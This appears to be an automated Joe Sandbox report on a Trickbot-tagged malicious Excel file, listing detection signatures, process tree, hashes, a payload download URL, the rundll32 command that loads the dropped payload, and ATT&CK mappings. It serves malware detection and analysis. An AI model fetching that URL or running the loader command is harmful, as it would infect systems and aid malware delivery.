Loading ...

Play interactive tourEdit tour

Analysis Report ORDER787-5.xls

Overview

General Information

Sample Name:ORDER787-5.xls
Analysis ID:336129
MD5:1d97c6cb50c4107498e4f0e76f539f0c
SHA1:a4dc090837c76aed324bea19c9f62e2d47bb7bc8
SHA256:1b761a682092f8be6c7e9eef709be08a7105159a5e4ffb7722b0530fba308ba4
Tags:Trickbotxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for dropped file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found malicious URLs in unpacked macro 4.0 sheet
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1748 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2340 cmdline: rundll32 C:\ProgramData\activex.ocx, DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2328 cmdline: rundll32 C:\ProgramData\activex.ocx, DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 2896 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: rundll32 C:\ProgramData\activex.ocx, DllRegisterServer , CommandLine: rundll32 C:\ProgramData\activex.ocx, DllRegisterServer , CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1748, ProcessCommandLine: rundll32 C:\ProgramData\activex.ocx, DllRegisterServer , ProcessId: 2340

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for dropped fileShow sources
Source: C:\ProgramData\activex.ocxReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\apperolew[1].pngReversingLabs: Detection: 15%

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: apperolew[1].png.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: www.penrithdentalimplants.com.au
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 160.153.76.195:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 160.153.76.195:443

Networking:

barindex
Found malicious URLs in unpacked macro 4.0 sheetShow sources
Source: before.2.99.0.sheet.csv_unpackMacro 4.0 Deobfuscator: https://www.penrithdentalimplants.com.au/ls/apperolew.png
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FBD1845.emfJump to behavior
Source: rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: www.penrithdentalimplants.com.au
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: before.2.99.0.sheet.csv_unpackString found in binary or memory: https://www.penrithdentalimplants.com.au/ls/apperolew.png
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

barindex
Found malicious Excel 4.0 MacroShow sources
Source: ORDER787-5.xlsInitial sample: URLDownloadToFileA
Source: ORDER787-5.xlsInitial sample: URLDownloadToFileA
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Content X I FW132 - '," jR V FK FL FM FN FO FP FQ FR FS FT FU FY FIN FX FY FZ GA GB CC GO
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: ORDER787-5.xlsInitial sample: CALL
Source: ORDER787-5.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: ORDER787-5.xlsInitial sample: Sheet size: 7889
Office process drops PE fileShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\apperolew[1].pngJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\activex.ocxJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000B826
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10009C77
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000BD68
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000C96E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10005DD0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000D667
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000C2AA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000E6DC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100057AA
Source: ORDER787-5.xlsOLE indicator, VBA macros: true
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10005D6C appears 35 times
Source: rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal100.expl.evad.winXLS@7/13@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\CFEE0000Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDBED.tmpJump to behavior
Source: ORDER787-5.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\ProgramData\activex.ocx, DllRegisterServer
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\ProgramData\activex.ocx, DllRegisterServer
Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\ProgramData\activex.ocx, DllRegisterServer
Source: unknownProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\ProgramData\activex.ocx, DllRegisterServer
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\ProgramData\activex.ocx, DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: ORDER787-5.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100018B0 DllRegisterServer,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrAccessResource,WriteFileGather,VirtualAlloc,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10005DB1 push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000A65E push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00352040 push dword ptr [edx+14h]; ret
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_003520EA push dword ptr [edx+14h]; ret
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\apperolew[1].pngJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\activex.ocxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\ProgramData\activex.ocxJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\apperolew[1].pngJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: ORDER787-5.xlsStream path 'Workbook' entropy: 7.98610242414 (max. 8.0)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\apperolew[1].pngJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100018B0 DllRegisterServer,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrAccessResource,WriteFileGather,VirtualAlloc,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10004844 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100018B0 DllRegisterServer,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LdrFindResource_U,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrAccessResource,WriteFileGather,VirtualAlloc,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001A0456 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001A095E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001E1030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10002AB0 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,GetCurrentThreadId,__freeptd,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10004844 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10005081 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100050A3 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_1000A672 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100026C4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\ProgramData\activex.ocx, DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100090B2 cpuid
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10007F84 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10002AB0 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,GetCurrentThreadId,__freeptd,

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting31Path InterceptionProcess Injection11Masquerading11OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery12Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution33Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSSystem Information Discovery24Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting31LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information21Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
ORDER787-5.xls5%VirustotalBrowse
ORDER787-5.xls4%ReversingLabsScript.Trojan.Heuristic

Dropped Files

SourceDetectionScannerLabelLink
C:\ProgramData\activex.ocx15%ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\apperolew[1].png15%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
4.2.rundll32.exe.2e0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

SourceDetectionScannerLabelLink
penrithdentalimplants.com.au1%VirustotalBrowse
www.penrithdentalimplants.com.au2%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
https://www.penrithdentalimplants.com.au/ls/apperolew.png4%VirustotalBrowse
https://www.penrithdentalimplants.com.au/ls/apperolew.png0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
penrithdentalimplants.com.au
160.153.76.195
truefalseunknown
www.penrithdentalimplants.com.au
unknown
unknownfalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comrundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmpfalse
          high
          http://www.icra.org/vocabulary/.rundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000003.00000002.2115864154.0000000001DA7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114786564.0000000002087000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://www.hotmail.com/oerundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmpfalse
            high
            https://www.penrithdentalimplants.com.au/ls/apperolew.pngbefore.2.99.0.sheet.csv_unpacktrue
            • 4%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://investor.msn.com/rundll32.exe, 00000003.00000002.2115627989.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2114348726.0000000001EA0000.00000002.00000001.sdmpfalse
              high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              160.153.76.195
              unknownUnited States
              26496AS-26496-GO-DADDY-COM-LLCUSfalse

              General Information

              Joe Sandbox Version:31.0.0 Red Diamond
              Analysis ID:336129
              Start date:05.01.2021
              Start time:13:00:07
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 35s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:ORDER787-5.xls
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • GSI enabled (VBA)
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.expl.evad.winXLS@7/13@1/1
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 41.9% (good quality ratio 38.5%)
              • Quality average: 75.4%
              • Quality standard deviation: 32.3%
              HCA Information:
              • Successful, ratio: 78%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .xls
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): dllhost.exe
              • TCP Packets have been reduced to 100
              • Excluded IPs from analysis (whitelisted): 8.248.135.254, 8.248.131.254, 67.27.157.126, 8.248.115.254, 8.248.139.254
              • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              13:00:52API Interceptor1x Sleep call for process: rundll32.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
